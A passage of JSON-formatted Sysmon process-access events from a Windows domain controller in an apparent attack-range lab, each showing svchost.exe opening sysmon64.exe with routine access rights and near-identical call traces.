C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.370\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.370","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.371\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.371","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.371\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 